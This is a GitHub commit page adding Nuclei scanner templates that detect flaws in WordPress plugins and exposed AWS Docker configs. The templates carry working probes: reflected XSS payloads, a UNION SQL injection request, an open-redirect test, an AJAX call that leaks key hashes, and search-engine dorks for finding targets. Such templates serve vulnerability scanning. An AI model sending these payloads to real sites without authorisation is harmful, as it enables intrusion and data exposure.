-
Notifications
You must be signed in to change notification settings - Fork 272
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
7209f40
commit d9f1761
Showing
93 changed files
with
5,144 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241218 | ||
20241219 |
59 changes: 59 additions & 0 deletions
59
poc/auth/accept-authorize-net-payments-using-contact-form-7.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: accept-authorize-net-payments-using-contact-form-7-236bcbdbfe25f4f674ac30a10158deed | ||
|
||
info: | ||
name: > | ||
Accept Authorize.NET Payments Using Contact Form 7 <= 2.2 - Unauthenticated Information Exposure | ||
author: topscoder | ||
severity: low | ||
description: > | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d8801b9a-afcb-483b-a018-4f68448e96de?source=api-scan | ||
classification: | ||
cvss-metrics: | ||
cvss-score: | ||
cve-id: | ||
metadata: | ||
fofa-query: "wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/" | ||
google-query: inurl:"/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/" | ||
shodan-query: 'vuln:' | ||
tags: cve,wordpress,wp-plugin,accept-authorize-net-payments-using-contact-form-7,low | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "accept-authorize-net-payments-using-contact-form-7" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 2.2') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
id: amazon-docker-config-disclosure | ||
|
||
info: | ||
name: Dockerrun AWS Configuration Exposure | ||
author: pd-team | ||
severity: medium | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/Dockerrun.aws.json' | ||
matchers: | ||
- type: word | ||
words: | ||
- 'AWSEBDockerrunVersion' | ||
- 'containerDefinitions' | ||
condition: and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
id: amazon-docker-config-disclosure | ||
|
||
info: | ||
name: Dockerrun AWS Configuration Exposure | ||
author: pd-team | ||
severity: medium | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/Dockerrun.aws.json' | ||
matchers: | ||
- type: word | ||
words: | ||
- 'AWSEBDockerrunVersion' | ||
- 'containerDefinitions' | ||
condition: and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2012-0901 | ||
|
||
info: | ||
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901 | ||
|
||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
id: CVE-2014-4544 | ||
|
||
info: | ||
name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS | ||
author: daffainfo | ||
severity: medium | ||
description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. | ||
reference: | ||
- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb | ||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4544 | ||
|
||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2014-4544 | ||
cwe-id: CWE-79 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
id: CVE-2021-24750 | ||
|
||
info: | ||
name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI | ||
author: cckuakilong | ||
severity: high | ||
description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks. | ||
reference: | ||
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 8.8 | ||
cve-id: CVE-2021-24750 | ||
cwe-id: CWE-89 | ||
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /wp-login.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Origin: {{RootURL}} | ||
Content-Type: application/x-www-form-urlencoded | ||
Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
- | | ||
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1 | ||
Host: {{Hostname}} | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- "266f89556d2b38ff067b580fb305c522" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
id: CVE-2021-25111 | ||
|
||
info: | ||
name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect | ||
author: akincibor | ||
severity: medium | ||
description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue. | ||
reference: | ||
- https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4 | ||
tags: wp-plugin,redirect,wordpress,wp,cve,cve2021,unauth | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2021-25111 | ||
cwe-id: CWE-601 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh" | ||
|
||
matchers: | ||
- type: regex | ||
part: header | ||
regex: | ||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,51 @@ | ||
id: CVE-2021-38314 | ||
|
||
info: | ||
name: Redux Framework - Unauthenticated Sensitive Information Disclosure | ||
author: meme-lord | ||
severity: medium | ||
reference: | ||
- https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ | ||
- https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c | ||
- https://blog.sorcery.ie/posts/redux_wordpress/ | ||
|
||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N | ||
cvss-score: 5.30 | ||
cve-id: CVE-2021-38314 | ||
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`." | ||
|
||
requests: | ||
- raw: | ||
- | | ||
GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Accept: */* | ||
- | | ||
GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Accept: */* | ||
stop-at-first-match: true | ||
matchers-condition: and | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- "len(body)<50" | ||
|
||
- type: regex | ||
name: meme | ||
regex: | ||
- '[a-f0-9]{32}' | ||
part: body | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
extractors: | ||
- type: regex | ||
part: body | ||
regex: | ||
- "[a-f0-9]{32}" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,52 @@ | ||
id: CVE-2021-39322 | ||
|
||
info: | ||
name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting | ||
author: dhiyaneshDK | ||
severity: medium | ||
description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. | ||
reference: | ||
- https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-39322 | ||
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322 | ||
- https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2021-39322 | ||
cwe-id: CWE-79 | ||
tags: wordpress,cve,cve2021,wp-plugin,authenticated | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /wp-login.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Origin: {{RootURL}} | ||
Content-Type: application/x-www-form-urlencoded | ||
Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
- | | ||
GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1 | ||
Host: {{Hostname}} | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '</script><script>alert(document.domain)</script>' | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- "text/html" | ||
|
||
# Enhanced by mp on 2022/03/23 |
Oops, something went wrong.